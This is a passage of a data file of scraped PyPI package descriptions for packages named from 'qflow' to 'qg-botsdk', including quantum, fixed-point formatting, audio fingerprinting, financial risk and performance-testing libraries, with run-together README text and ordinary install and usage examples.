so many people smarter than I am.If you're looking to use the ANU quantum random number server for actual work, don't use this repo \u2014 this is just a silly thing I made, functional though it is.This project, on the other hand, has a wide array of utility.\nCheck it out!Thisis also pretty cool."} +{"package": "qflow", "pacakge-description": "qflow package for personal use"} +{"package": "qflow-vmc", "pacakge-description": "QFLOW - Quantum Variational Monte Carlo with Neural NetworksSee thedocumentation pagesfor details regarding theqflowpackage.For the accompanying master's thesis, seewriting/Thesis.pdf"} +{"package": "qfly", "pacakge-description": "No description available on PyPI."} +{"package": "qfmath", "pacakge-description": "No description available on PyPI."} +{"package": "qfmu", "pacakge-description": "qfmuis a python package to generatecontinuous-time,LTIsystem FMUs from command line.InstallationInstallqfmuthrough PyPIpip install qfmuNotedthat a C compiler is requiredmsvcfor Windowsgccfor Linuxclangfor MacOSFeaturesCurrently, qfmu is able to generate fmus that are compliant withFMI2standard.The following models are supported:ModelMECSState Space (ss)\u2714\ufe0f\u2714\ufe0fTransfer Function (tf)\u2714\ufe0f\u2714\ufe0fZeroPoleGain (zpk)\u2714\ufe0f\u2714\ufe0fPID (pid)\u2714\ufe0f\u2714\ufe0fNotedthat only continuous-time models are supported currently.ExamplesGenerate a continuous-time state space FMUqfmuss-A\"[[1,2],[3,4]]\"-B\"[[1],[2]]\"-C\"[[1,0],[0,1]]\"-x0\"[3.14, 6]\"-o./example_ss.fmuIfqfmuis installed properly, you should see aexample_ss.fmufile generated in your current working directory.If you havefmpyinstalled, you can runfmpy info example_ss.fmuto see detailed model information.Model Info\n\n FMI Version 2.0\n FMI Type Model Exchange, Co-Simulation\n Model Name q\n Description None\n Platforms c-code, linux64\n Continuous States 2\n Event Indicators 0\n Variables 10\n Generation Tool qfmu\n Generation Date 2023-10-08 
21:24:32.733857\n\nDefault Experiment\n\n Stop Time 1.0\n Tolerance 0.0001\n\nVariables (input, output)\n\n Name Causality Start Value Unit Description\n u1 input 0.0 Model input 1\n y1 output Model output 1\n y2 output Model output 2Generate a continuous-time transfer function FMU using thenumerator,denominatorrepresentation: $\\frac{s}{s+1}$qfmutf--num\"[1]\"--den\"[1,1]\"-o./example_tf.fmuGenerate a continuous-time transfer function FMU using thezero-pole-gainrepresentation: $\\frac{0.5(s-1)}{(s+1)(s+2)}$qfmuzpk-z\"[1]\"-p\"[-1, -2]\"-k0.5-o./example_zpk.fmuGenerate a continuous-time PI controller FMU: $3 + \\frac{0.1}{s}$qfmupid--kp=3.0--ki=0.1-o./example_pid.fmu"} +{"package": "qfnn", "pacakge-description": "qfnnThe \"qfnn\" (or QuantumFlow Neural Network Library)\nis a library to support the implementation\nofQuantumFlowand its extensions, includingQF-MixerandQF-RobustNN."} +{"package": "qforce", "pacakge-description": "Quantum Mechanically augmented molecularforcefieldsPlease see theDocumentation.If you use Q-Force, please cite:Sami, S.; Menger, M. F. S. J.; Faraji, S.; Broer, R.; Havenith, R. W. A., Q-Force: Quantum Mechanically Augmented Molecular Force Fields. Journal of Chemical Theory and Computation 2021, 17 (8), 4946-4960."} +{"package": "qformat", "pacakge-description": "qformat"} +{"package": "qformatpy", "pacakge-description": "IntroductionWelcome to the qformat Python library, a powerful tool for formatting floating-point\nnumbers into fixed-point representation with Q notation.This library supports ARM\u2019s Q format, where QI includes the sign bit.The main function, qformat, allows users to specify the number of integer bits (QI),\nfractional bits (QF), whether the number is signed or unsigned, and provides flexibility\nin choosing rounding and overflow handling methods.Whether you\u2019re working on embedded systems, signal processing, or any application requiring fixed-point\nrepresentation, qformat is here to streamline the process.The example below shows pi being converter to the sQ4.8 format, using Truncation as the\nrounding method:>>>fromqformatpyimportqformat>>>x=3.141592653589793>>>result=qformat(x,qi=4,qf=8,rnd_method='Trunc')>>>resultarray([3.140625])InstallationThe qformatpy library is available via PIP install:python3-mvenvpyenvsourcepyenv/bin/activatepipinstallqformatpyImport the package as shown below:importqformatpyExample usage>>>importnumpyasnp>>>importqformatpy>>>test_array=np.array([1.4,5.57,3.14])>>>qformatpy.rounding(test_array,'TowardsZero')array([1,5,3])>>>qformatpy.rounding(test_array,'HalfDown')array([1,6,3])LinksDocumentation:https://qformatpy.readthedocs.io/en/latest/"} +{"package": "qformer", "pacakge-description": "QformerImplementation of Qformer from BLIP2 in Zeta Lego blocks. The implementation is here straight from Figure 2. 
In particular the image block and text block.Installpip3 install qformerUsageimporttorchfromqformerimportQFormerx=torch.randn(1,32,512)# Create a random tensor of shape (1, 32, 512)img=torch.randn(1,32,512)# Create another random tensor of shape (1, 32, 512)qformer=QFormer(512,8,8,0.1,2,2)# Create an instance of the QFormer modely=qformer(x,img)# Apply the QFormer model to the input tensors x and imgprint(y.shape)# Print the shape of the output tensor yLicenseMITCitation@misc{li2023blip2,\n title={BLIP-2: Bootstrapping Language-Image Pre-training with Frozen Image Encoders and Large Language Models}, \n author={Junnan Li and Dongxu Li and Silvio Savarese and Steven Hoi},\n year={2023},\n eprint={2301.12597},\n archivePrefix={arXiv},\n primaryClass={cs.CV}\n}"} +{"package": "qfp", "pacakge-description": "QfpQfp is a python library for creating audio fingerprints that are robust to alterations in pitch and speed. This method is ideal for ID'ing music from recordings such as DJ sets where the tracks are commonly played at a different pitch or speed than the original recording. Qfp is an implementation of the audio fingerprinting/recognition algorithms detailed in a 2016 academic paper by Reinhard Sonnleitner and Gerhard Widmer[1].NOTE: This is a fork ofhttps://github.com/mbortnyck/qfp/which incorporates:multiple bug fixesPython 3 compatibiltymodern packaging with PoetryThis is all in service of having a convient audio fingerprinting service\nfor a website I'm working on.QuickstartInstall by downloading it from PyPI.pipinstallqfpYou can create a fingerprint from your reference audio...fromqfpimportReferenceFingerprintfp_r=ReferenceFingerprint(\"Prince_-_Kiss.mp3\")fp_r.create()...or a query fingerprint from an audio clip that you wish to identify.fromqfpimportQueryFingerprintfp_q=QueryFingerprint(\"unknown_audio.wav\")fp_q.create()The QfpDB can store reference fingerprints...fromqfp.dbimportQfpDBdb=QfpDB()db.store(fp_r,\"Prince - Kiss\")... and look up query fingerprints.fp_q=QueryFingerprint(\"kiss_pitched_up.mp3\")fp_q.create()db.query(fp_q)print(fp_q.matches)[Match(record=u'Prince - Kiss',offset=0,vScore=0.7077922077922078)]Qfp currently accepts recordings inany format that FFmpeg can handle.DependenciesFFmpeg -https://github.com/FFmpeg/FFmpegNumPy -https://github.com/numpy/numpyPydub -https://github.com/jiaaro/pydubSciPy -https://github.com/scipy/scipySQLite -https://www.sqlite.org/[1]\tR. Sonnleitner and G. Widmer, \"Robust quad-based audio fingerprinting,\" IEEE/ACM Transactions on Audio, Speech and Language Processing (TASLP), vol. 24, no. 3, pp. 409\u2013421, Jan. 2016. [Online]. Available:http://ieeexplore.ieee.org/abstract/document/7358094/. Accessed: Nov. 15, 2016."} +{"package": "qf-package", "pacakge-description": "No description available on PyPI."} +{"package": "qfracture", "pacakge-description": "Overviewqfracture is a Qt based front end exposing a fracture project. The interface\nallows for data browsing and searching as well as data interaction.For full details on fracture please see:https://github.com/mikemalinowski/fractureBrowsingqFracture displays a browsing panel which allows you to navigate data in a\nnatural way - which is particularly useful if your data is file based.Right clicking aData Assetexposes the functionality bound to that data.SearchingWithin qFracture you can perform searches against your dataset. 
Fracture is\nvery quick at resolving searches - so this can be a preferable mechanism\nwhen interacting with data if you have a reasonable idea of what you're looking\nfor.When no search entries are present this view will show any Data Elements which\nyou have marked as being favourites - allowing them to be accessed very quickly\nwith no overhead.Setting up a ProjectThe qFracture UI offers a wizard to make it easy to set up a new fracture\nproject. This guides you through the process of defining the data structure\nlocation, the plugin locations and where you want to save your project file.It will also initiate a short scan of your data location. Depending on how\nbig your data set is, this can take a little time.Upon completion your data set is entirely searchable.System TrayThe qFracture UI only performs a deep scan during the first time setup. Beyond\nthat, each location is re-scanned as you traverse those locations through the\nbrowser panel.If you want time-based scans to occur you can trigger the System Tray application (which is launchable from the Settings tab). The system tray\nallows you to specify an interval time (in seconds), and enable or disable\ntimed scans.This approach allows the scanning to occur in a completely different process\nto any qFracture instances, which can aid performance, especially if you're\nrunning qFracture from within environments such as Maya or Max etc.CollaborationI am always open to collaboration, so if you spot bugs let me know, or if\nyou would like to contribute or get involved just shout!CompatibilityLaunchpad has been tested under Python 2.7 and Python 3.7 on Windows and Ubuntu."}
{"package": "qfragment", "pacakge-description": "No description available on PyPI."}
{"package": "qfrm", "pacakge-description": "Quantitative Financial Risk Management (QFRM) project is a (rapidly growing) set of analytical tools\nto measure, manage and visualize identified risks of derivatives and portfolios in finance.Why use the Quantitative Financial Risk Management (QFRM) package:We apply the object-oriented programming (OOP) paradigm to abstract the complexities of financial valuation.Plentiful examples: each class has numerous examples, including sensitivity plots and multidimensional visualization.Resources: we included references (J.C.Hull\u2019s OFOD textbook, academic research and online resources) we used to build and validate our analytical tools.Simplicity, consistency and usability: QFRM uses basic data structures as user inputs/outputs (I/O).Longevity: qfrm dependencies are limited to the Python Standard Library, pandas, numpy, scipy, and matplotlib.We try to sensibly vectorize our functions to help you with application of QFRM functionality.All programming is done with usability/scalability/extendability/performance in mind.This project grows rapidly with an effort from a dozen bright quant finance developers. Check back for updates throughout Fall 2015.Our Team:This is a group of ambitious and diligent Rice University science students from doctoral, master's and undergraduate programs. United in their work, we expand and contribute to the finance community and QFRM course, led by Oleg Melnikov, a statistics doctoral student and instructor of QFRM course at Rice University, Department of Statistics.Oleg Melnikov (author, creator), Department of Statistics, Rice University, http://Oleg.Rice.edu, xisreal@gmail.com Thaw Da Aung (contributor), Department of Physics, Thawda.Aung@rice.edu Yen-Fei Chen (contributor), Department of Statistics, Yen-Fei.Chen@rice.edu Patrick J. 
Granahan (contributor), Department of Computer Science,pjgranahan@rice.eduHanting Li (contributor), Department of Statistics,HANTING.LI@rice.eduSha (Andy) Liao (contributor), Department of Physics,Andy.Liao@rice.eduScott Morgan (contributor), Department of Computer Science,spmorgan@rice.eduAndrew M. Weatherly (contributor), Department of Computational and Applied Mathematics,amw13@rice.eduMengyan Xie (contributor), Department of Electrical Engineering,Mengyan.Xie@rice.eduTianyi Yao (contributor), Department of Electrical Engineering,Tianyi.Yao@rice.eduRunmin Zhang (contributor), Department of Physics,Runmin.Zhang@rice.eduOOP Design and functionality:In progress:Bond pricing is temporarily disabled (will return soon), but you\u2019ll find numerous exotic option pricing (via Black-Scholes model, lattice tree, Monte Carlo simulation and finite differencing) in the package.classPVCF(present value of cash flows) accepts time-indexed cash flows and a yield curve to compute:net present value (NPV), internal rate or return (IRR), time value of money (TVM)Linearly interpolated yield curve with time-to-maturities (TTM) matching those of cash flows (CF)Visualization: CF diagramclassBond(inheritsPVCF) accepts coupon/frequency/TTM specification along with optional yield curve (with optional TTM) to compute:Valuation and performance analytics: clean/dirty price, yield to maturity (ytm), par and current yieldinterest rates (IR) are assumed to be continuously compounded (CC), but user has a method to convert from/to any frequency.Risk analytics: Macaulay/Modified/Effective durations, convexityVisualization: CF diagram, dirty/clean price convergence, price sensitivity curves and slopes with and without convexity adjustment.classUtilprovides some helpful functionality for verifying/standardizing in I/O of other class\u2019 methods.Planned implementation:Fixed income portfolio analytics, exotic option pricing (via lattice, Black-Scholes model (BSM),\nMonte Carlo simulations, and Finite Differencing Methods (FDM)), and further visualization of concepts in finance.Genesis:This project started as aQFRM R packagein Spring 2015 QFRM course (STAT 449 and STAT 649) at Rice University.The course is part of computational finance and economic systems (CoFES) program,\nled byDr. Katherine Ensor.Underlying textbook (source of financial calculations and algorithms)Options, Futures and other Derivatives (OFOD)by John C. Hull, 9ed, 2014,ISBN 0133456315is a well established text in finance and risk management. Major certification exams in finance (CFA, FRM, CAIA, CQF, \u2026) list it as a core reference.Install:Directly from PyPI with pip command in a terminal (or windows command, cmd.exe) prompt, assumingpipis in your PATH:$pipinstallqfrmTypical usage:3% annually-paying bond with 3.1 TTM (in years), evaluated at 5% continuously compounded (CC) yield-to-maturity (YTM),\ni.e. 
flat yield curve (YC)>>>Bond(3,1,3.1,pyz=.05).analytics()------------------Bondanalytics:------------------------*Annualcoupon,$:3*Couponfrequency,p.a.:1Timetomaturity(ttm),yrs:3.1*Cashflows,$p.a.:(3.0,3.0,3.0,103.0)Timetocashflows(ttcf),yrs:(0.10000000000000009,1.1,2.1,3.1)Dirtyprice(PVCF),$:96.73623*Cleanprice(PVCF-AI),$:94.03623YTM,CCrate:0.05YTM,rateatcouponfrequency:0.05127Currentyield,rateatcouponfrequency:0.0319*Paryield,rateatcouponfrequency:0.03883Yieldcurve,CCrate:(0.05,0.05,0.05,0.05)Macaulayduration,yrs:2.9208Modifiedduration,yrs:2.77835Effectiveduration,yrs:2.92126*Convexity,yrs^2:8.92202Desc:{}------------------------------------------------------------------------------Medianruntime(microsec)for1iteration(s):11604.918843659107Textbook example (default) of 6% SA bond with 2 years/time to maturity (TTM), see p.83 in Hull\u2019s OFOD/9ed>>>Bond().analytics()4% semi-annual (SA) bond with 4.25 ttm (4 years and 3 mo), evaluated at $97.5 PVCF (which computes to 4.86% ytm or flat YC)>>>b=Bond(4,2,4.25,pyz=97.5)>>>b.ytm()# compute yield from supplied (PVCF) price ($97.5 assumed)0.048615328294339864>>>b.ytm(px_target=(97.5,98,99,100,101))# vectorized computation of yield-to-maturity(0.048615328294339864,0.047305618596811434,0.04470725938701976,0.04213648737177501,0.039592727021145635)>>>b.analytics()# prints full report and visualizationThe same 4% SA bond evaluated with a specific YC.\nZero rates are assumed to have TTM matching those of cash flows (CF), left to right.\nInsufficient rates are extrapolated with a constant.>>>b.set_pyz(pyz=(.05,.06,.07,.08)).analytics()The same 4% SA bond evaluated with a specific YC. User provides zero rates with corresponding TTM.\nTTM required to evaluate CF are extra/interpolated from existing curve with constant rates on each side.>>>b.set_pyz(pyz=(.05,.06,.04,.03),ttz=(.5,1,2,6)).analytics()This project uses industry-accepted acronyms:AI: accrued interestAPT: arbitrage pricing theoremASP: active server pages (i.e. 
HTML scripting on server side) by Microsoftb/w: betweenbip: basis pointsBM: Brownian motion (aka Wiener Process)Bmk: benchmarkBOPM: binomial option pricing modelbp: basis pointsBSM: Black-Scholes model or Black-Scholes-Merton modelBT: binomial treec.c.: continuous compoundingCC: continuous compoundingCCP: central counterpartyCCRR: continuously compounded rate of returnCDS: credit default swapCDO: credit default obligationCF: cash flowsCmdt: commodityCorp: corporate (finance or sector)CP: counterparty (in finance)CUSIP: Committee on Uniform Security Identification Procedures, North-American financial security identifier (like ISIN)ESO: employee stock optionETD: exchange-traded derivativeFE: financial engineeringFDM: Finite differencing methodFRA: forward rate agreementFRN: floating rate notesFwd: forwardFX: foreign currency or foreign currency exchangeFV: future valueGBM: geometric Brownian motionGvt: governmentHld: holdingIdx: indexIM: initial marginIR: interest rateIRD: interest rate derivativesIRTS: interest rate term structureISIN: International Securities Identification NumberLIBID: London Interbank bid rateLIBOR: London Interbank Offered RateLT: lattice tree (i.e binomial, trinomial, \u2026)MA: margin account; moving averageMC: margin callMC: Monte Carlo simulationMgt: managementMkt: marketMM: maintenance marginMP: Markov processMTM: marking to marketMtge: mortgageMV: multivariateOFOD: Options, Futures, and Other DerivativesOFOD9e: Options, Futures, and Other Derivatives, 9th editionOIS: overnight index SWAP rateOOP: object oriented programmingp.a.: per annumPD: probability of defaultPDE: partial differential equationPM: portfolio managerPORTIA: portfolio accounting system by Thomson FinancialPts: pointsPV: present valuePVCF: present value of cash flowsQFRM: quantitative financial risk managementREPO: Repurchase agreement rateRFR: risk free rateRN: risk-neutralRNW: risk-neutral worldRoI: return on investmentRoR: rate of returnr.v.: random variables.a.: semi-annualSA: semi-annualSAC: semi-annual compoundingSP: stochastic processSQL: sequel query languageSQP: standard Wiener processSURF: step up recovery floaters (floating rate notes)TBA: to be announcedTBD: To be determinedTOMS: Trade Order Management Solution (or System)Trx: transactionTS: time seriesTSA: time series analysisTTCF: time to cash flowsTTM: time to maturityTVM: time value of moneyUDF: user defined functionURL: universe resource locatorVaR: value at riskVar: varianceVB: Visual Basic (by Microsoft)VBA: Visual Basic for ApplicationsVol: volatilityWAC: weighted-average couponWAM: weighted-average maturityWP: Wiener process (aka Brownian motion)YC: yield curveYld: yieldZCB: zero coupon bond"} +{"package": "qfsclient", "pacakge-description": "No description available on PyPI."} +{"package": "qft", "pacakge-description": "# Toolkit for Lattice QFT## FeaturesHMC implemented with jax autodifferentiation"} +{"package": "qftiful", "pacakge-description": "QFT Beautiful"} +{"package": "qftify", "pacakge-description": "Python package for QFT Calculation"} +{"package": "qftplib", "pacakge-description": "# qftplib"} +{"package": "qfunction", "pacakge-description": "QfunctionLibrary for researcher with statistics and mechanics equation non-extensive \ud83d\udcc8\ud83d\udcca\ud83d\udcdaNon-extensive worksThis package is for development and works using the deformed non-extensive algebra, using for calculus, the simple algebra and the specials functions from quantum mechanics and theoretical physic, on the non-extensive mode.The all 
functions and equation on this work, is based in the articles and papers fromDr. Bruno G. da Costa, your friend, thePhD Ign\u00e1cio S. Gomesand others peoples and articles about the non-extensive works.Installation:this lib is found on the site of packages for python thepypiand on the site that is a repository for the codes and softwares with licenses from majority business of the word, thegithub.Linux$pipinstallqfunction-UWindowsC\\:> py -m pip install qfunction -UExamplesfundamentalssimple algebrafromqfunction.fundamentals.canonicimportprodfromqfunction.fundamentalsimportq_sum,q_mult,q_ln,q_sub#the sum deformed on q=1print(q_sum(4,2,1,q=1))#output: 6#the sum deformed on q=1.9print(q_sum(4,2,1,q=1.9))#output: -0.200000000000351#the multiplication deformed on q=1print(q_mult(1,2,q=1))#output: 2#the multiplication deformed on q=.8print(q_mult(1,2,q=.8))#output: 1.9999999999999998#the natural logarithm on q=1print(q_ln(3,q=1))#output: 1.0984848484848484#the natural logarithm deformed on q=.5print(q_ln(3,q=.5))#output: 1.4641016151377162print(q_sub(4,3,q=.9))Quantumcreating a quantum circuit basefromqfunction.quantumimportQuantumCircuitasQcq=1.qc=Qc(4,q=q)qc.Y(2)qc.H(2,1)qc.med(2)#print(qc)any equationsfromqfunction.quantum.equationsimportS,S_qfromqfunction.fundamentalsimportq_cos,q_sinfromnumpyimportarray,linspace,pit=array([1,2,34,56,34,23])p=t/t.sum()#print(p)#print(S(p))t=linspace(-2,2,100)*2*pitheta=t/2gamma=tq=1## testing the entropy deformed ##print(S_q(theta,gamma,q))q=.5print(S_q(theta,gamma,q))q=1.5print(S_q(theta,gamma,q))Algorithmsone simlpe example of code game on quantum circuit deformedfromqfunction.quantumimportQuantumCircuitasQcfromqfunction.quantum.algorithmsimportArenaGameq=.9qc=Qc(1,q=q)game=ArenaGame(qc=qc)game.up()game.left()game.left()game.show()Others Examples on colab."} +{"package": "qfunctions", "pacakge-description": "Uma simples biblioteca com fun\u00e7\u00f5es deformadasfun\u00e7\u00f5es especiais para trabalho com q-deformado usado para analise de sistesmas complexos"} +{"package": "qfunk", "pacakge-description": "No description available on PyPI."} +{"package": "qfx-scraper", "pacakge-description": "# QFX ScraperA simple scrapper for [https://qfxcinemas.com](https://qfxcinemas.com) site.## UsageInstall the `qfx-scraper` package by running:```bashpipenv install qfx-scraper```Now you can test the scraper.```python>>> from qfx import QFXScraper>>> scraper = QFXScraper()>>> scraper.get_movies()[, , , , , , , , , , , , , , , ]>>> # let's see now showing>>> scraper.showing[, , , , , , , , ]>>> # similarly, coming soon>>> scraper.coming_up[, , , , , , ]```"} +{"package": "qg-aio-eureka", "pacakge-description": "# python \u8fde\u63a5 EUREKA\u66f4\u65b0\u65f6\u95f4\uff1a2019-06-12\n\u7248\u672c\uff1aV0.1.2\n\u66f4\u65b0\u5185\u5bb9\u53ca\u72b6\u6001\uff1a[x] \u65b0\u589e\u540c\u6b65\u83b7\u53d6app\u63a5\u53e3"} +{"package": "qgate-graph", "pacakge-description": "QGate-GraphThe QGate graph generates graphical outputs based on performance tests (QGate Perf). Key benefits:provide graphs about Performance/Throughput and Response time (on typically client side)provide graphs about Executors in timeThese graphs only visualize outputs from performance tests, it is not replacement of\ndetail views from Grafana, Prometheus, etc. in detail of CPU, GPU, RAM, I/O etc. 
on side of testing system.Usagefromqgate_graph.graph_performanceimportGraphPerformancefromqgate_graph.graph_executorimportGraphExecutorimportlogging# setup login levellogging.basicConfig()logging.getLogger().setLevel(logging.INFO)# generate performance/throughput graphsgraph=GraphPerformance()graph.generate_from_dir()# generate excutors in time graphsgraph=GraphExecutor()graph.generate_from_dir()OutputsPerformance/Throughput & Response timeExecutors in time"} +{"package": "qgate-perf", "pacakge-description": "QGate-PerfThe QGate Performance is enabler for performance test execution. Key benefits:easy performance testingyour python code (key parts - init, start, stop, return)measure only specific partof your codescalabilitywithout limits(e.g. from 1 to 1k executors)scalabilityin level of processes and threads(easy way, how to avoid GIL in python)sequences for execution and data bulkrelation to graph generatorUsagefromqgate_perf.parallel_executorimportParallelExecutorfromqgate_perf.parallel_probeimportParallelProbefromqgate_perf.run_setupimportRunSetupimporttimedefprf_GIL_impact(run_setup:RunSetup):\"\"\" Your own function for performance testing, you have to addonly part INIT, START, STOP and RETURN\"\"\"# INIT - contain executor synchonization, if neededprobe=ParallelProbe(run_setup)while(True):# START - probe, only for this specific code partprobe.start()forrinrange(run_setup.bulk_row*run_setup.bulk_col):time.sleep(0)# STOP - probeifprobe.stop():break# RETURN - data from probereturnprobe# Execution settinggenerator=ParallelExecutor(prf_GIL_impact,label=\"GIL_impact\",detail_output=True,output_file=\"prf_gil_impact_01.txt\")# Run setup, with test execution 20 seconds and zero delay before start# (without waiting to other executors)setup=RunSetup(duration_second=20,start_delay=0)# Run performance test with:# data bulk_list with two data sets# - first has 10 rows and 5 columns as [10, 5]# - second has 1000 rows and 50 columns as [1000, 50]# executor_list with six executor sets# - first line has three executors with 2, 4 and 8 processes each with 2 threads# - second line has three executors with 2, 4 and 8 processes each with 4 threadsgenerator.run_bulk_executor(bulk_list=[[10,5],[1000,50]],executor_list=[[2,2,'2x thread'],[4,2,'2x thread'],[8,2,'2x thread'],[2,4,'4x thread'],[4,4,'4x thread'],[8,4,'4x thread']],run_setup=setup)# Note: We made 12 performance tests (two bulk_list x six executor_list) and write# outputs to the file 'prf_gil_impact_01.txt'# We generate performance graph based on performance tests to the# directory './output/graph-perf/*' (two files each for different bundle)generator.create_graph_perf()Outputs in text file############### 2023-05-05 06:30:36.194849 ###############\n{\"type\": \"headr\", \"label\": \"GIL_impact\", \"bulk\": [1, 1], \"available_cpu\": 12, \"now\": \"2023-05-05 06:30:36.194849\"}\n {\"type\": \"core\", \"plan_executors\": 4, \"plan_executors_detail\": [4, 1], \"real_executors\": 4, \"group\": \"1x thread\", \"total_calls\": 7590439, \"avrg_time\": 1.4127372338382197e-06, \"std_deviation\": 3.699171006877347e-05, \"total_call_per_sec\": 2831382.8673804617, \"endexec\": \"2023-05-05 06:30:44.544829\"}\n {\"type\": \"core\", \"plan_executors\": 8, \"plan_executors_detail\": [8, 1], \"real_executors\": 8, \"group\": \"1x thread\", \"total_calls\": 11081697, \"avrg_time\": 1.789265660825848e-06, \"std_deviation\": 4.164309967620533e-05, \"total_call_per_sec\": 4471107.994274894, \"endexec\": \"2023-05-05 06:30:52.623666\"}\n {\"type\": \"core\", 
\"plan_executors\": 16, \"plan_executors_detail\": [16, 1], \"real_executors\": 16, \"group\": \"1x thread\", \"total_calls\": 8677305, \"avrg_time\": 6.2560950624827455e-06, \"std_deviation\": 8.629422798757681e-05, \"total_call_per_sec\": 2557505.8946835063, \"endexec\": \"2023-05-05 06:31:02.875799\"}\n {\"type\": \"core\", \"plan_executors\": 8, \"plan_executors_detail\": [4, 2], \"real_executors\": 8, \"group\": \"2x threads\", \"total_calls\": 2761851, \"avrg_time\": 1.1906723084757647e-05, \"std_deviation\": 0.00010741937495211329, \"total_call_per_sec\": 671889.3135459893, \"endexec\": \"2023-05-05 06:31:10.283786\"}\n {\"type\": \"core\", \"plan_executors\": 16, \"plan_executors_detail\": [8, 2], \"real_executors\": 16, \"group\": \"2x threads\", \"total_calls\": 3605920, \"avrg_time\": 1.858694254439209e-05, \"std_deviation\": 0.00013301637613377212, \"total_call_per_sec\": 860819.3607844017, \"endexec\": \"2023-05-05 06:31:18.740831\"}\n {\"type\": \"core\", \"plan_executors\": 16, \"plan_executors_detail\": [4, 4], \"real_executors\": 16, \"group\": \"4x threads\", \"total_calls\": 1647508, \"avrg_time\": 4.475957498576462e-05, \"std_deviation\": 0.00020608402170105327, \"total_call_per_sec\": 357465.41393855185, \"endexec\": \"2023-05-05 06:31:26.008649\"}\n############### Duration: 49.9 seconds ###############Outputs in text file with detail############### 2023-05-05 07:01:18.571700 ###############\n{\"type\": \"headr\", \"label\": \"GIL_impact\", \"bulk\": [1, 1], \"available_cpu\": 12, \"now\": \"2023-05-05 07:01:18.571700\"}\n {\"type\": \"detail\", \"processid\": 12252, \"calls\": 1896412, \"total\": 2.6009109020233154, \"avrg\": 1.371490426143325e-06, \"min\": 0.0, \"max\": 0.0012514591217041016, \"st-dev\": 3.6488665183545995e-05, \"initexec\": \"2023-05-05 07:01:21.370528\", \"startexec\": \"2023-05-05 07:01:21.370528\", \"endexec\": \"2023-05-05 07:01:26.371062\"}\n {\"type\": \"detail\", \"processid\": 8944, \"calls\": 1855611, \"total\": 2.5979537963867188, \"avrg\": 1.4000530264084008e-06, \"min\": 0.0, \"max\": 0.001207590103149414, \"st-dev\": 3.6889275786419565e-05, \"initexec\": \"2023-05-05 07:01:21.466496\", \"startexec\": \"2023-05-05 07:01:21.466496\", \"endexec\": \"2023-05-05 07:01:26.466551\"}\n {\"type\": \"detail\", \"processid\": 2108, \"calls\": 1943549, \"total\": 2.6283881664276123, \"avrg\": 1.3523652691172758e-06, \"min\": 0.0, \"max\": 0.0012514591217041016, \"st-dev\": 3.624462003401045e-05, \"initexec\": \"2023-05-05 07:01:21.709203\", \"startexec\": \"2023-05-05 07:01:21.709203\", \"endexec\": \"2023-05-05 07:01:26.709298\"}\n {\"type\": \"detail\", \"processid\": 19292, \"calls\": 1973664, \"total\": 2.6392557621002197, \"avrg\": 1.3372366127670262e-06, \"min\": 0.0, \"max\": 0.0041027069091796875, \"st-dev\": 3.620965943471147e-05, \"initexec\": \"2023-05-05 07:01:21.840541\", \"startexec\": \"2023-05-05 07:01:21.840541\", \"endexec\": \"2023-05-05 07:01:26.841266\"}\n {\"type\": \"core\", \"plan_executors\": 4, \"plan_executors_detail\": [4, 1], \"real_executors\": 4, \"group\": \"1x thread\", \"total_calls\": 7669236, \"avrg_time\": 1.3652863336090071e-06, \"std_deviation\": 3.645805510967187e-05, \"total_call_per_sec\": 2929788.3539391863, \"endexec\": \"2023-05-05 07:01:26.891144\"}\n ...Graphs generated from qgate-graph based on outputs from qgate-perf512 executors (128 processes x 4 threads)32 executors (8 processes x 4 threads)"} +{"package": "qgates", "pacakge-description": "QGatescreated by Austin PoorA small package with some 
helper functions and quantum gates represented as numpy matrices.GitHub:https://github.com/a-poor/QGatesPyPi:https://pypi.org/project/qgatesRead the Docs:https://qgates.readthedocs.ioRequirementsPython 3NumpyInstallationpipinstallqgates"} +{"package": "qgate-sln-mlrun", "pacakge-description": "QGate-Sln-MLRunThe Quality Gate for solution MLRun (and Iguazio). The main aims of the project are:independent quality test (function, integration, acceptance, ... tests)deeper quality checks before full rollout/use in company environmentsidentification of possible compatibility issues (if any)external and independent test coverageetc.The tests use these key components, MLRun solution seeGIT mlrun,\nsample meta-data model seeGIT qgate-modeland this project.Test scenariosThe quality gate covers these test scenarios (\u2705 done, \u274c in-progress/planned):Project\u2705 TS101: Create project(s)\u2705 TS102: Delete project(s)Feature set\u2705 TS201: Create feature set(s)Ingest data\u2705 TS301: Ingest data to feature set(s)Feature vector\u2705 TS401: Create feature vector(s)Get data\u2705 TS501: Get data from off-line feature vector(s)\u2705 TS502: Get data from on-line feature vector(s)Build model\u2705 TS601: Build CART model\u274c TS602: Build XGBoost model\u274c TS603: Build DNN modelServe model\u2705 TS701: Serving score from CART\u274c TS702: Serving score from XGBoost\u274c TS703: Serving score from DNNNOTE: Each test scenario contains addition specific test cases.Test sourcesThe quality gate tests these sources (\u2705 done, \u274c in-progress/planned):Off-line\u2705 ParquetTarget, \u2705 CSVTargetOn-line\u2705 RedisTarget, \u274c SQLTarget, \u274c KafkaTarget\u274c SQLSourceOther\u2705 Pandas DataFrame (as Source)Sample of outputsThe reports in original form, see:all DONE -HTML,TXTwith ERR -HTML,TXTUsageYou can easy use this solution in four steps:Download content of these two GIT repositories to your local environmentqgate-sln-mlrunqgate-modelUpdate fileqgate-sln-mlrun.envfrom qgate-modelUpdate variables for MLRun/Iguazio, seeMLRUN_DBPATH,V3IO_USERNAME,V3IO_ACCESS_KEY,V3IO_APIsetting ofV3IO_*is needed only in case of Iguazio installation (not for pure free MLRun)Update variables for QGate, seeQGATE_*(basic description directly in *.env)detail setupconfigurationRun fromqgate-sln-mlrunpython main.pySee outputs'./output/qgt-mlrun-*.html''./output/qgt-mlrun-*.txt'Precondition: You have available MLRun or Iguazio solution (MLRun is part of that),\nsee officialinstallation steps, or directly installation forDesktop Docker.Tested withThe project was tested with these MLRun versions (seechange log):MLRun(in Desktop Docker)MLRun 1.5.2, 1.5.1, 1.5.0MLRun 1.4.1MLRun 1.3.0Iguazio(k8s, on-prem with VM with VMware)Iguazio 3.5.3 (with MLRun 1.4.1)Iguazio 3.5.1 (with MLRun 1.3.0)NOTE: Current state, only the last MLRun/Iguazio versions are valid for testing.TODO listThe list of expected/future improvementssee"} +{"package": "qg-botsdk", "pacakge-description": 
